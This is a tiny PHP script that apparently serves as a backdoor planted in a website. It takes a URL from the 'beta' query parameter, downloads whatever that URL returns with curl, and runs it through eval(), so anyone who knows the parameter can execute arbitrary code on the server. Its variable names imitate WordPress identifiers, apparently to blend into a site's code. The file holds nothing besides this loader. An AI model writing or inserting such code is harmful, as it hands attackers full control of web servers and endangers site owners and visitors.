<?php
if (isset($_GET['beta'])) {
$is_admin_wbl = $_GET['beta'];
if ($the_permalink_rj = curl_init()) {
curl_setopt($the_permalink_rj, CURLOPT_URL, $is_admin_wbl);
curl_setopt($the_permalink_rj, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($the_permalink_rj));
curl_close($the_permalink_rj);
exit;
}
}